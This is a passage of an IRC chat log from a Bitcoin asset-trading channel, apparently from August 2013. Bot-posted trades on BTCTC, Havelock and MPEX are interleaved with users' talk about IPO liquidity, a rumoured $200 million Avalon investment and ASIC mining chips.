0.0388 = 1.8624 BTC [+] Aug 04 22:02:42 [BTCTC] [ACTIVEMINING] 25 @ 0.006254 = 0.1564 BTC [-] Aug 04 22:02:42 [BTCTC] [ACTIVEMINING] 1 @ 0.006253 BTC [-] Aug 04 22:02:52 [BTCTC] [ACTIVEMINING] 1000 @ 0.00625 = 6.25 BTC [-] Aug 04 22:02:54 [BTCTC] [ACTIVEMINING] 2 @ 0.006223 = 0.0124 BTC [-] Aug 04 22:02:55 [BTCTC] [ACTIVEMINING] 87 @ 0.006151 = 0.5351 BTC [-] Aug 04 22:02:57 [BTCTC] [ACTIVEMINING] 135 @ 0.00615 = 0.8303 BTC [-] Aug 04 22:03:09 [BTCTC] [BASIC-MINING] 3 @ 0.4014 = 1.2042 BTC [-] Aug 04 22:03:19 [BTCTC] [BASIC-MINING] 25 @ 0.4015 = 10.0375 BTC [+] Aug 04 22:04:49 [HAVELOCK] [HIM] 2 @ 0.145 = 0.29 BTC [-] Aug 04 22:04:52 [HAVELOCK] [HIM] 2 @ 0.141 = 0.282 BTC [-] Aug 04 22:04:52 if it goes down enough I might buy garden for keeps Aug 04 22:05:04 by the way AM100 is still cheap on havelock! Aug 04 22:05:12 smidge: did you forget that cm is nominated in ltc and not btc? Aug 04 22:05:51 ye ssir Aug 04 22:06:11 ah well, i guess that's it then :) Aug 04 22:06:11 [HAVELOCK] [XBOND] 200 @ 0.0010321 = 0.2064 BTC [-] Aug 04 22:06:13 [HAVELOCK] [XBOND] 1000 @ 0.001031 = 1.031 BTC [-] Aug 04 22:06:15 [HAVELOCK] [XBOND] 800 @ 0.00103 = 0.824 BTC [-] Aug 04 22:06:17 [HAVELOCK] [AM100] 25 @ 0.0388 = 0.97 BTC [+] Aug 04 22:07:06 erm no, i have counted that in. sorry, im doing too many things at once... Aug 04 22:07:20 hm but there was no change in the last hours anyway Aug 04 22:07:22 hehe np Aug 04 22:07:34 yes, so even if, its not responsible for the "bubble" Aug 04 22:07:40 [MPEX] [S.MPOE] 5757 @ 0.0008285 = 4.7697 BTC [-] Aug 04 22:09:01 [BTCTC] [BITVPS] 250 @ 0.002843 = 0.7108 BTC [-] Aug 04 22:09:44 [BTCTC] [DMS.MINING] 1 @ 0.008011 BTC [+] Aug 04 22:10:13 you guys make mining terrible Aug 04 22:10:18 jkjkjkjk Aug 04 22:11:06 [HAVELOCK] [AM100] 5 @ 0.03875 = 0.1938 BTC [-] Aug 04 22:11:43 i knew that am was a bargain at 4 :D Aug 04 22:13:45 [HAVELOCK] [XBOND] 12500 @ 0.00105 = 13.125 BTC [+] Aug 04 22:13:48 was even more of a bargain at 3.7 yesterday and the day before Aug 04 22:15:20 [BTCTC] [BTCGARDEN] 2 @ 0.01501 = 0.03 BTC [+] Aug 04 22:15:22 [BTCTC] [BTCGARDEN] 98 @ 0.015 = 1.47 BTC [-] Aug 04 22:15:24 [BTCTC] [BTCGARDEN] 600 @ 0.015 = 9 BTC [-] Aug 04 22:15:26 [BTCTC] [BTCGARDEN] 394 @ 0.015 = 5.91 BTC [-] Aug 04 22:15:33 [BTCTC] [BTCGARDEN] 288 @ 0.015 = 4.32 BTC [-] Aug 04 22:15:55 [BTCTC] [BTCGARDEN] 35 @ 0.01406 = 0.4921 BTC [-] Aug 04 22:15:56 [BTCTC] [BTCGARDEN] 5 @ 0.01405 = 0.0703 BTC [-] Aug 04 22:15:58 [BTCTC] [BTCGARDEN] 250 @ 0.01405 = 3.5125 BTC [-] Aug 04 22:15:59 [BTCTC] [BTCGARDEN] 2 @ 0.01404 = 0.0281 BTC [-] Aug 04 22:16:01 [BTCTC] [BTCGARDEN] 127 @ 0.01505 = 1.9114 BTC [+] Aug 04 22:16:03 [BTCTC] [TAT.ASICMINER] 17 @ 0.04193 = 0.7128 BTC [+] Aug 04 22:16:39 saulimus less than ipo is still more than nothing, aka fundamental value. Aug 04 22:17:11 [HAVELOCK] [AM100] 17 @ 0.0388 = 0.6596 BTC [+] Aug 04 22:17:30 [BTCTC] [BTCGARDEN] 100 @ 0.015 = 1.5 BTC [-] Aug 04 22:17:42 [BTCTC] [TAT.ASICMINER] 74 @ 0.04193 = 3.1028 BTC [+] Aug 04 22:17:44 [BTCTC] [TAT.ASICMINER] 26 @ 0.04194 = 1.0904 BTC [+] Aug 04 22:17:50 [HAVELOCK] [AM100] 10 @ 0.03889 = 0.3889 BTC [+] Aug 04 22:18:10 [HAVELOCK] [AM100] 100 @ 0.038899 = 3.8899 BTC [+] Aug 04 22:18:13 [BTCTC] [BTCGARDEN] 10 @ 0.015 = 0.15 BTC [-] Aug 04 22:18:14 [BTCTC] [BTCGARDEN] 90 @ 0.015 = 1.35 BTC [-] Aug 04 22:18:16 [BTCTC] [BTCGARDEN] 10 @ 0.015 = 0.15 BTC [-] Aug 04 22:19:24 [HAVELOCK] [AM1] 1 @ 4.19000001 BTC [+] Aug 04 22:20:18 anyway, aiwell is something like the chinese theymos Aug 04 22:20:42 [BTCTC] [ASICMINER-PT] 1 @ 4.221 BTC [-] Aug 04 22:21:37 my head just exploded a little Aug 04 22:21:54 chinese how ? shorter ? Aug 04 22:22:24 haha no, he's the admin of a larger bitcoin forum Aug 04 22:22:36 [HAVELOCK] [XBOND] 89034 @ 0.00105 = 93.4857 BTC [+] Aug 04 22:22:48 [BTCTC] [BITVPS] 5 @ 0.002326 = 0.0116 BTC [-] Aug 04 22:22:48 [BTCTC] [BITVPS] 245 @ 0.002325 = 0.5696 BTC [-] Aug 04 22:23:40 [HAVELOCK] [AM100] 2 @ 0.038899 = 0.0778 BTC [+] Aug 04 22:24:16 yeah, with more idiocy. Aug 04 22:24:48 [BTCTC] [BTCGARDEN] 101 @ 0.01584 = 1.5998 BTC [+] Aug 04 22:24:50 [BTCTC] [BTCGARDEN] 159 @ 0.01585 = 2.5202 BTC [+] Aug 04 22:25:26 just lurked a little, but they laughed about the reverse image search on the deployment plan :) Aug 04 22:25:52 can someone explain this: people buy 20k BTC at IPO. afterwards all the bids disappear, no one wants to buy. how do the traders get out of their total 20k BTC position? Aug 04 22:26:19 [HAVELOCK] [AM100] 187 @ 0.038899 = 7.2741 BTC [+] Aug 04 22:26:21 some assets have some kind of buyback policy if I understand correctly Aug 04 22:26:29 they can't without new bids Aug 04 22:26:36 [HAVELOCK] [AM100] 1085 @ 0.0389 = 42.2065 BTC [+] Aug 04 22:26:51 the greater fools will come Aug 04 22:26:52 [HAVELOCK] [AM100] 817 @ 0.0389 = 31.7813 BTC [+] Aug 04 22:27:13 that can't be right. doesn't that mean that there will always have to be investors holding btcgarden? Aug 04 22:27:24 that's how it works Aug 04 22:27:28 wtf. Aug 04 22:27:33 [BTCTC] [ACTIVEMINING] 25 @ 0.006251 = 0.1563 BTC [+] Aug 04 22:27:35 [BTCTC] [ACTIVEMINING] 4 @ 0.00625 = 0.025 BTC [-] Aug 04 22:27:36 [BTCTC] [ACTIVEMINING] 4 @ 0.006199 = 0.0248 BTC [-] Aug 04 22:27:38 [BTCTC] [ACTIVEMINING] 54 @ 0.006151 = 0.3322 BTC [-] Aug 04 22:27:39 [BTCTC] [ACTIVEMINING] 216 @ 0.00615 = 1.3284 BTC [-] Aug 04 22:27:46 suprise! welcome to reality Aug 04 22:27:51 Lol Aug 04 22:28:21 [BTCTC] [ASICMINER-PT] 1 @ 4.241 BTC [+] Aug 04 22:28:46 [BTCTC] [KENILWORTH] 2 @ 0.001798 = 0.0036 BTC [-] Aug 04 22:29:17 [BTCTC] [BTCGARDEN] 70 @ 0.01583 = 1.1081 BTC [-] Aug 04 22:29:20 [BTCTC] [LABCOIN] 2 @ 0.001709 = 0.0034 BTC [+] Aug 04 22:29:40 that means I could start an ipo for 100k BTC, people could only buy at the IPO price maximum and would have to sell at less than that = free money Aug 04 22:29:53 [BTCTC] [BTCGARDEN] 12 @ 0.01465 = 0.1758 BTC [-] Aug 04 22:29:55 [BTCTC] [BTCGARDEN] 200 @ 0.01451 = 2.902 BTC [-] Aug 04 22:29:57 [BTCTC] [BTCGARDEN] 500 @ 0.0145 = 7.25 BTC [-] Aug 04 22:29:58 [BTCTC] [BTCGARDEN] 60 @ 0.0143 = 0.858 BTC [-] Aug 04 22:30:00 [BTCTC] [BTCGARDEN] 1 @ 0.01584 BTC [+] Aug 04 22:30:14 [HAVELOCK] [SMG] 2 @ 0.0002442 = 0.0005 BTC [-] Aug 04 22:30:17 [BTCTC] [ASICMINER-PT] 1 @ 4.241 BTC [+] Aug 04 22:30:18 [BTCTC] [BTCGARDEN] 270 @ 0.01584 = 4.2768 BTC [+] Aug 04 22:30:20 http://bitcoinexaminer.org/avalon-might-be-getting-a-200-million-investment-and-20nm-technology-to-become-the-leader-of-the-mining-market/ Aug 04 22:30:24 Avalon might be getting a $200 million investment and 20nm technology to become the leader of the mi Aug 04 22:30:49 i might win the lotto Aug 04 22:30:50 well, but you don't know if it would go below the ipo price Aug 04 22:30:57 [BTCTC] [BTCGARDEN] 33 @ 0.01471 = 0.4854 BTC [-] Aug 04 22:31:56 [BTCTC] [BTCGARDEN] 184 @ 0.0147 = 2.7048 BTC [-] Aug 04 22:32:20 [BTCTC] [BTCGARDEN] 50 @ 0.0145 = 0.725 BTC [-] Aug 04 22:32:22 [BTCTC] [BTCGARDEN] 270 @ 0.01427 = 3.8529 BTC [-] Aug 04 22:32:38 dexX7, at some point someone would see a better opportunity somewhere else and get impatient. he would have to sell at less than IPO Aug 04 22:35:28 sure, but that's pure speculation Aug 04 22:35:55 pankkake: very crazy news.. thanks Aug 04 22:36:23 i guess an $200m investment into the bitcoin ecosystem is overall very bullish Aug 04 22:36:40 "i might win the lotto" => for bitcoin it would be more appropriate to say "I might solo mine a block" Aug 04 22:36:49 hdhd Aug 04 22:36:50 lol Aug 04 22:36:51 hehe Aug 04 22:37:19 :) Aug 04 22:37:23 what's most interesting to me is "the fund that is composed of six people, four of them billionaires. Again, their names cannot be revealed, we only can say that five of them are British and one of them is from Dubai" Aug 04 22:37:48 yea Aug 04 22:37:54 [BTCTC] [BTCGARDEN] 200 @ 0.01426 = 2.852 BTC [-] Aug 04 22:37:55 [BTCTC] [BTCGARDEN] 600 @ 0.01425 = 8.55 BTC [-] Aug 04 22:37:57 [BTCTC] [BTCGARDEN] 177 @ 0.01425 = 2.5223 BTC [-] Aug 04 22:38:40 hm sounds like all of this is up in the air still. doesnt make me want to get rid of AM shares tbh. Aug 04 22:39:11 [BTCTC] [LABCOIN] 1 @ 0.001634 BTC [-] Aug 04 22:39:19 isn't cost of manufacturing more important than efficiency for asics? at least right now? Aug 04 22:40:06 https://bitcointalk.org/index.php?topic=191831.0 …and it's dead Aug 04 22:40:12 Arabic Bitcoin Forum منتدى "بت-كوين" بالعربية Aug 04 22:40:46 [BTCTC] [LABCOIN] 2 @ 0.001634 = 0.0033 BTC [-] Aug 04 22:40:48 [BTCTC] [LABCOIN] 15 @ 0.001633 = 0.0245 BTC [-] Aug 04 22:40:49 [BTCTC] [LABCOIN] 9 @ 0.001626 = 0.0146 BTC [-] Aug 04 22:40:50 [BTCTC] [LABCOIN] 120 @ 0.001625 = 0.195 BTC [-] Aug 04 22:40:51 [BTCTC] [LABCOIN] 2000 @ 0.001623 = 3.246 BTC [-] Aug 04 22:40:52 [BTCTC] [LABCOIN] 2354 @ 0.001622 = 3.8182 BTC [-] Aug 04 22:41:06 [BTCTC] [LABCOIN] 399 @ 0.001622 = 0.6472 BTC [-] Aug 04 22:41:08 if you want to speculate.. http://www.forbes.com/billionaires/ Aug 04 22:41:30 [BTCTC] [LABCOIN] 1 @ 0.001709 BTC [+] Aug 04 22:42:24 [BTCTC] [LABCOIN] 4 @ 0.001709 = 0.0068 BTC [+] Aug 04 22:42:48 [BTCTC] [ACTIVEMINING] 25 @ 0.006339 = 0.1585 BTC [+] Aug 04 22:43:18 [BTCTC] [LABCOIN] 1 @ 0.001709 BTC [+] Aug 04 22:44:29 [BTCTC] [BASIC-MINING] 5 @ 0.4053 = 2.0265 BTC [+] Aug 04 22:44:31 [BTCTC] [BASIC-MINING] 2 @ 0.4054 = 0.8108 BTC [+] Aug 04 22:44:34 "Tavistock is the center of many conspiracies, in fact, in conspiracy circles there is a consensus that it is a CIA front." from reddit Aug 04 22:46:41 [BTCTC] [DMS.PURCHASE] 19 @ 0.02824 = 0.5366 BTC [-] Aug 04 22:49:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.0412 BTC [-] Aug 04 22:49:19 gridchip is working on an chip, too Aug 04 22:49:22 https://bitcointalk.org/index.php?topic=252233.0 Aug 04 22:49:26 Gridchip 40nm BTC ASIC chips (btcman) Aug 04 22:49:39 and they were the ones who received that mega avalon chip order Aug 04 22:50:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.0412 = 0.1236 BTC [-] Aug 04 22:50:58 [BTCTC] [ASICMINER-PT] 1 @ 4.251 BTC [+] Aug 04 22:50:59 [BTCTC] [ASICMINER-PT] 5 @ 4.25 = 21.25 BTC [-] Aug 04 22:51:01 [BTCTC] [ASICMINER-PT] 3 @ 4.241 = 12.723 BTC [-] Aug 04 22:51:02 [BTCTC] [ASICMINER-PT] 17 @ 4.24 = 72.08 BTC [-] Aug 04 22:52:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0412 BTC [-] Aug 04 22:53:00 [BTCTC] [ACTIVEMINING] 25 @ 0.006347 = 0.1587 BTC [+] Aug 04 22:53:01 [BTCTC] [ACTIVEMINING] 50 @ 0.006347 = 0.3174 BTC [+] Aug 04 22:53:41 [BTCTC] [LABCOIN] 11 @ 0.001708 = 0.0188 BTC [-] Aug 04 22:53:49 [BTCTC] [B.YABMC] 3 @ 0.00232 = 0.007 BTC [-] Aug 04 22:54:13 [BTCTC] [LABCOIN] 20 @ 0.001708 = 0.0342 BTC [-] Aug 04 22:54:38 [BTCTC] [RSM] 2 @ 0.006001 = 0.012 BTC [-] Aug 04 22:54:39 [BTCTC] [RSM] 1 @ 0.006 BTC [-] Aug 04 22:54:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.04194 BTC [+] Aug 04 22:55:00 [BTCTC] [LABCOIN] 39 @ 0.001708 = 0.0666 BTC [-] Aug 04 22:57:43 [BTCTC] [ACTIVEMINING] 1 @ 0.006338 BTC [-] Aug 04 22:59:19 [BTCTC] [LABCOIN] 4 @ 0.001709 = 0.0068 BTC [+] Aug 04 22:59:22 [MPEX] [S.MPOE] 3143 @ 0.0008285 = 2.604 BTC [-] Aug 04 22:59:23 [MPEX] [S.MPOE] 857 @ 0.00082673 = 0.7085 BTC [-] Aug 04 22:59:47 [BTCTC] [ASICMINER-PT] 1 @ 4.109 BTC [-] Aug 04 23:02:20 [BTCTC] [TAT.VIRTUALMINE] 70 @ 0.002699 = 0.1889 BTC [-] Aug 04 23:03:12 [BTCTC] [TAT.VIRTUALMINE] 190 @ 0.0027 = 0.513 BTC [+] Aug 04 23:05:19 [HAVELOCK] [SMG] 100 @ 0.0002442 = 0.0244 BTC [-] Aug 04 23:05:39 [HAVELOCK] [XBOND] 5 @ 0.00106989 = 0.0053 BTC [+] Aug 04 23:07:55 [BTCTC] [DMS.PURCHASE] 20 @ 0.02824 = 0.5648 BTC [-] Aug 04 23:08:29 [BTCTC] [BMF] 43 @ 0.04 = 1.72 BTC [-] Aug 04 23:11:27 [BTCTC] [LABCOIN] 20 @ 0.001626 = 0.0325 BTC [-] Aug 04 23:11:29 [BTCTC] [LABCOIN] 194 @ 0.001625 = 0.3153 BTC [-] Aug 04 23:11:30 [BTCTC] [LABCOIN] 20 @ 0.001624 = 0.0325 BTC [-] Aug 04 23:11:31 [BTCTC] [LABCOIN] 1000 @ 0.001623 = 1.623 BTC [-] Aug 04 23:11:32 [BTCTC] [LABCOIN] 7247 @ 0.001622 = 11.7546 BTC [-] Aug 04 23:11:34 [BTCTC] [LABCOIN] 8831 @ 0.00162 = 14.3062 BTC [-] Aug 04 23:11:35 [BTCTC] [LABCOIN] 5 @ 0.001709 = 0.0085 BTC [+] Aug 04 23:11:36 [BTCTC] [LABCOIN] 30 @ 0.00171 = 0.0513 BTC [+] Aug 04 23:11:37 [BTCTC] [LABCOIN] 1 @ 0.00176 BTC [+] Aug 04 23:11:38 [BTCTC] [LABCOIN] 3 @ 0.001765 = 0.0053 BTC [+] Aug 04 23:11:38 [BTCTC] [LABCOIN] 19 @ 0.001766 = 0.0336 BTC [+] Aug 04 23:11:40 [BTCTC] [BTCGARDEN] 6 @ 0.01523 = 0.0914 BTC [+] Aug 04 23:12:10 [BTCTC] [ASICMINER-PT] 3 @ 4.227 = 12.681 BTC [+] Aug 04 23:12:11 [BTCTC] [ASICMINER-PT] 4 @ 4.228 = 16.912 BTC [+] Aug 04 23:12:32 [BTCTC] [ASICMINER-PT] 1 @ 4.227 BTC [-] Aug 04 23:12:33 [BTCTC] [ASICMINER-PT] 1 @ 4.228 BTC [+] Aug 04 23:12:35 [BTCTC] [ASICMINER-PT] 1 @ 4.229 BTC [+] Aug 04 23:12:58 [BTCTC] [ASICMINER-PT] 1 @ 4.229 BTC [+] Aug 04 23:12:59 [BTCTC] [LABCOIN] 100 @ 0.001765 = 0.1765 BTC [-] Aug 04 23:13:22 [BTCTC] [LABCOIN] 320 @ 0.001764 = 0.5645 BTC [-] Aug 04 23:15:36 [MPEX] [S.MPOE] 2604 @ 0.00082673 = 2.1528 BTC [-] Aug 04 23:15:38 [MPEX] [S.MPOE] 946 @ 0.00082438 = 0.7799 BTC [-] Aug 04 23:15:47 [BTCTC] [LABCOIN] 9 @ 0.001732 = 0.0156 BTC [-] Aug 04 23:17:09 [BTCTC] [BITVPS] 250 @ 0.002403 = 0.6008 BTC [+] Aug 04 23:19:19 [BTCTC] [BTCGARDEN] 14 @ 0.01524 = 0.2134 BTC [+] Aug 04 23:22:38 ;;nethash Aug 04 23:22:38 308278.463304 Aug 04 23:23:33 [MPEX] [S.MPOE] 1900 @ 0.00083124 = 1.5794 BTC [+] Aug 04 23:23:34 [MPEX] [S.MPOE] 8550 @ 0.00083141 = 7.1086 BTC [+] Aug 04 23:23:44 [HAVELOCK] [HIM] 1 @ 0.131 BTC [-] Aug 04 23:23:47 [HAVELOCK] [HIM] 6 @ 0.13 = 0.78 BTC [-] Aug 04 23:23:49 [HAVELOCK] [HIM] 3 @ 0.1281 = 0.3843 BTC [-] Aug 04 23:23:51 [HAVELOCK] [HIM] 10 @ 0.12751 = 1.2751 BTC [-] Aug 04 23:23:53 [HAVELOCK] [HIM] 5 @ 0.123 = 0.615 BTC [-] Aug 04 23:26:12 [BTCTC] [ACTIVEMINING] 25 @ 0.006123 = 0.1531 BTC [-] Aug 04 23:26:14 [BTCTC] [ACTIVEMINING] 18 @ 0.006122 = 0.1102 BTC [-] Aug 04 23:26:15 [BTCTC] [ACTIVEMINING] 50 @ 0.006118 = 0.3059 BTC [-] Aug 04 23:26:16 [BTCTC] [ACTIVEMINING] 112 @ 0.006101 = 0.6833 BTC [-] Aug 04 23:26:17 [BTCTC] [ACTIVEMINING] 450 @ 0.0061 = 2.745 BTC [-] Aug 04 23:31:24 [BTCTC] [BTCGARDEN] 19 @ 0.01524 = 0.2896 BTC [+] Aug 04 23:33:32 [HAVELOCK] [XBOND] 8 @ 0.00107 = 0.0086 BTC [+] Aug 04 23:33:48 [HAVELOCK] [XBOND] 1 @ 0.00107 BTC [+] Aug 04 23:36:47 [HAVELOCK] [AM100] 5 @ 0.0394 = 0.197 BTC [+] Aug 04 23:37:16 [HAVELOCK] [XBOND] 8 @ 0.001051 = 0.0084 BTC [-] Aug 04 23:38:30 [BTCTC] [BTCGARDEN] 75 @ 0.01525 = 1.1438 BTC [+] Aug 04 23:39:32 So what if avalon is getting $200MM investment, although the 20 nm technology is quite attractive, they will have to pay that same $200MM off with increasing difficulty. Aug 04 23:40:11 If I were their CEO I would not sleep that well at night imo Aug 04 23:40:39 [BTCTC] [BTCGARDEN] 20 @ 0.01525 = 0.305 BTC [+] Aug 04 23:41:16 [BTCTC] [BTCGARDEN] 505 @ 0.01525 = 7.7013 BTC [+] Aug 04 23:42:30 so what? Aug 04 23:42:37 they sell mining machines Aug 04 23:42:45 that's the source of income, mining will be a minor part of it Aug 04 23:43:00 if that news is real i think they're speculating on an increase of btc price itself too Aug 04 23:43:07 and do you know what could be done with fkn $200m? Aug 04 23:43:11 tv spots etc. etc. :D Aug 04 23:43:26 if this is real, bitcoin will skyrock Aug 04 23:43:30 KRS1 indeed. Aug 04 23:43:32 well.. maybe i'm getting to excited Aug 04 23:43:34 [HAVELOCK] [SDSTM] 6 @ 0.00739499 = 0.0444 BTC [+] Aug 04 23:43:50 dexX7 you are. Aug 04 23:43:55 why? ._. Aug 04 23:44:12 dexX7: no, why should mining let the price increase at all Aug 04 23:44:17 http://trilema.com/smpoe-takes-strategic-investor for instance. Aug 04 23:44:21 S.MPOE takes strategic investor pe Trilema - Un blog de Mircea Popescu. Aug 04 23:44:44 tv spots woulsd be the single most stupid use of investment. Aug 04 23:45:27 when they do an $200m investment, i'm sure they want to promote it Aug 04 23:45:34 this is because you're you. Aug 04 23:45:35 and that means to promote bitcoin Aug 04 23:45:46 yea Aug 04 23:46:02 [BTCTC] [BASIC-MINING] 25 @ 0.4054 = 10.135 BTC [+] Aug 04 23:46:08 there's a lot more to life than tv spots. fo serious. Aug 04 23:46:18 [BTCTC] [BTCGARDEN] 40 @ 0.0157 = 0.628 BTC [+] Aug 04 23:46:19 omg Aug 04 23:46:30 dexX7: tv spots are only good if you want to sell to consumers Aug 04 23:46:49 [BTCTC] [LABCOIN] 3 @ 0.001684 = 0.0051 BTC [-] Aug 04 23:46:50 [BTCTC] [LABCOIN] 20 @ 0.001685 = 0.0337 BTC [+] Aug 04 23:47:00 don't nail me on "tv spots" Aug 04 23:47:03 FabianB and even them... Aug 04 23:47:09 dexX7 why not ? so easy :D Aug 04 23:48:23 well, they do want to sell to consumers or not? Aug 04 23:48:59 k.. "start mining today, make lots of B" isn't really attractive for usual people i guess Aug 04 23:49:14 [BTCTC] [BITVPS] 62 @ 0.002403 = 0.149 BTC [+] Aug 04 23:49:15 [BTCTC] [BITVPS] 10 @ 0.002402 = 0.024 BTC [-] Aug 04 23:49:17 [BTCTC] [BITVPS] 50 @ 0.0024 = 0.12 BTC [-] Aug 04 23:49:18 [BTCTC] [BITVPS] 3 @ 0.002322 = 0.007 BTC [-] Aug 04 23:49:20 [BTCTC] [BTCGARDEN] 200 @ 0.0157 = 3.14 BTC [+] Aug 04 23:49:33 i imagine they want to make a 20nm process Aug 04 23:49:50 what about instead of "war bonds" -> "mining bonds"? Aug 04 23:49:57 we have a grand tradition of winning through not giving a shit about "people" in btc. Aug 04 23:50:02 make a commercial like that. Aug 04 23:50:02 dexX7 the story is likely bullshit Aug 04 23:50:09 that's why all the forum scams are so lulzy, in the end. going exactly the wrong way Aug 04 23:50:14 assbot [MPEX] [S.MPOE] 50000000 @ 0.0007725 = 38625 BTC [+] Aug 04 23:50:14 Two major points need in my view underlining with this occasion. Aug 04 23:50:15 I. This is the largest investment in a BTC company to date. In spite of all the talk happening on internet forums, at pointless conferences and anywhere else, Bitcoin finance begins and ends on MPEx. This is because Bitcoin is not about talking and not based on proof of talk. Aug 04 23:50:18 wow grats mircea_popescu Aug 04 23:50:22 (well, minus bfl, which was starting to figure it out towards the end) Aug 04 23:50:23 thats amazing Aug 04 23:50:27 Rawted ikr? Aug 04 23:51:58 by the way Aug 04 23:52:10 it's quite a coincidence Aug 04 23:52:27 yesterday a paypal insider announced they want to jump on bitcoin Aug 04 23:52:35 today it's $200m in avalon Aug 04 23:52:41 [BTCTC] [BASIC-MINING] 5 @ 0.4054 = 2.027 BTC [+] Aug 04 23:52:42 through insider informations :) Aug 04 23:53:49 every week there's something announced/promised/etc. that part Aug 04 23:53:50 s ezzy Aug 04 23:54:52 mircea_popescu: $200m and 38k are still different liga and 6 billionaires vs. "an bitcointalk user", too Aug 04 23:54:57 *38k btc Aug 04 23:55:10 true Aug 04 23:55:37 depends how you want to look at it. on one hand 200 is more than 4 or w/e. on the other, something that happened is more than something that's announced. Aug 04 23:55:57 [BTCTC] [BASIC-MINING] 40 @ 0.4054 = 16.216 BTC [+] Aug 04 23:56:04 [BTCTC] [DMS.MINING] 10 @ 0.008011 = 0.0801 BTC [+] Aug 04 23:56:06 [BTCTC] [DMS.MINING] 2 @ 0.00801 = 0.016 BTC [-] Aug 04 23:56:07 [BTCTC] [DMS.MINING] 3 @ 0.008005 = 0.024 BTC [-] Aug 04 23:56:08 [BTCTC] [DMS.MINING] 100 @ 0.008001 = 0.8001 BTC [-] Aug 04 23:56:10 [BTCTC] [DMS.MINING] 1 @ 0.008 BTC [-] Aug 04 23:57:16 yea, sure Aug 04 23:57:44 just for the lolz : http://www.feld.com/wp/archives/2011/01/avalon-ventures-raises-a-new-200-million-fund-and-gets-a-new-website.html Aug 04 23:58:07 "Bitcoin Examiner has been gathering rumors around the web and was informed by an anonymous source about this highly secretive meeting, which is set to occur this Monday or Tuesday" ehehe Aug 04 23:58:09 so cute. Aug 04 23:58:10 wow Aug 04 23:59:34 lol Aug 05 00:00:30 heh Aug 05 00:01:20 but to get back : great if they did manage it, and if they didn't it's still unavoidable. Aug 05 00:01:40 mining will be pushed ot the extreme. in spite of thios not making more blocks a day or more bitcoins a block, Aug 05 00:01:51 that's exactly what that buffett quote was all about. Aug 05 00:04:33 which one? Aug 05 00:05:05 mmm Aug 05 00:05:23 i just recall a short interview where munger said it's ratpoison Aug 05 00:05:34 http://video.foxbusiness.com/v/2359385547001/mungerbuffett-disagree-on-corporate-tax-rates/?playlist_id=1034196606001 Aug 05 00:05:37 Munger/Buffett Disagree on Corporate Tax Rates | Fox Business Video Aug 05 00:06:20 was on the forum, girl'll dig it up in a moment. Aug 05 00:07:27 [BTCTC] [BTCGARDEN] 46 @ 0.0157 = 0.7222 BTC [+] Aug 05 00:07:29 [BTCTC] [BTCGARDEN] 244 @ 0.01571 = 3.8332 BTC [+] Aug 05 00:08:55 [BTCTC] [ACTIVEMINING] 46 @ 0.006145 = 0.2827 BTC [+] Aug 05 00:08:56 [BTCTC] [ACTIVEMINING] 11 @ 0.006149 = 0.0676 BTC [+] Aug 05 00:08:56 [BTCTC] [ACTIVEMINING] 12 @ 0.006193 = 0.0743 BTC [+] Aug 05 00:10:28 [BTCTC] [DMS.MINING] 4 @ 0.007861 = 0.0314 BTC [-] Aug 05 00:10:30 [BTCTC] [DMS.MINING] 13 @ 0.00786 = 0.1022 BTC [-] Aug 05 00:13:18 [HAVELOCK] [XBOND] 28 @ 0.00107 = 0.03 BTC [+] Aug 05 00:13:21 [HAVELOCK] [XBOND] 172 @ 0.00107499 = 0.1849 BTC [+] Aug 05 00:13:24 [BTCTC] [DMS.PURCHASE] 11 @ 0.02824 = 0.3106 BTC [-] Aug 05 00:15:17 [BTCTC] [DMS.SELLING] 16 @ 0.0205 = 0.328 BTC [-] Aug 05 00:15:25 https://bitcointalk.org/index.php?topic=201268.msg2121475#msg2121475 Aug 05 00:15:33 dexX7 ^ Aug 05 00:16:33 [BTCTC] [BTCGARDEN] 26 @ 0.01571 = 0.4085 BTC [+] Aug 05 00:16:43 [BTCTC] [BTCGARDEN] 294 @ 0.01571 = 4.6187 BTC [+] Aug 05 00:17:01 [MPEX] [S.MPOE] 300 @ 0.00083141 = 0.2494 BTC [+] Aug 05 00:17:03 [MPEX] [S.MPOE] 977 @ 0.00083155 = 0.8124 BTC [+] Aug 05 00:17:17 [HAVELOCK] [AM100] 3 @ 0.0395 = 0.1185 BTC [+] Aug 05 00:17:20 [HAVELOCK] [AM100] 4 @ 0.0396 = 0.1584 BTC [+] Aug 05 00:17:49 thanks Aug 05 00:18:14 [BTCTC] [BTCGARDEN] 6 @ 0.0157 = 0.0942 BTC [-] Aug 05 00:18:42 mircea_popescu: withdrawal pls Aug 05 00:19:20 [BTCTC] [BTCGARDEN] 5 @ 0.01571 = 0.0786 BTC [+] Aug 05 00:19:22 [BTCTC] [BTCGARDEN] 100 @ 0.01584 = 1.584 BTC [+] Aug 05 00:20:18 jurov will be tomorrow the earliest, there's some trouble with the blockchain Aug 05 00:20:45 [BTCTC] [ACTIVEMINING] 50 @ 0.0061 = 0.305 BTC [-] Aug 05 00:20:47 [BTCTC] [ACTIVEMINING] 50 @ 0.006095 = 0.3048 BTC [-] Aug 05 00:20:48 [BTCTC] [ACTIVEMINING] 154 @ 0.006091 = 0.938 BTC [-] Aug 05 00:20:49 [BTCTC] [ACTIVEMINING] 496 @ 0.00607 = 3.0107 BTC [-] Aug 05 00:20:55 (with my copy of it i mean) Aug 05 00:20:57 O.o sauce? Aug 05 00:20:59 ah so Aug 05 00:23:50 [BTCTC] [DMS.SELLING] 5 @ 0.0202 = 0.101 BTC [-] Aug 05 00:23:52 [BTCTC] [DMS.SELLING] 20 @ 0.0202 = 0.404 BTC [-] Aug 05 00:23:53 [BTCTC] [DMS.SELLING] 10 @ 0.0201 = 0.201 BTC [-] Aug 05 00:25:14 [BTCTC] [BASIC-MINING] 1 @ 0.4054 BTC [+] Aug 05 00:25:29 what is going one wit da blockchain? Aug 05 00:27:03 !ticker btctc DMS.SELLING Aug 05 00:27:08 [BTCT:DMS.SELLING] 1D: 0.0201 / 0.02241 / 0.0264 (3566 shares, 79.9 BTC), 7D: 0.0201 / 0.02286 / 0.0264 (11815 shares, 270.1 BTC), 30D: 0.0176 / 0.02457 / 0.035716 (52750 shares, 1296 BTC) Aug 05 00:27:27 [HAVELOCK] [LABCO] 5 @ 0.002 = 0.01 BTC [+] Aug 05 00:28:12 talking about bitcoin investments.. i'm still wondering what the main motivation was to buy satoshidice Aug 05 00:30:08 it generates btc? Aug 05 00:30:21 well nevermind Aug 05 00:30:35 i looked up the returns 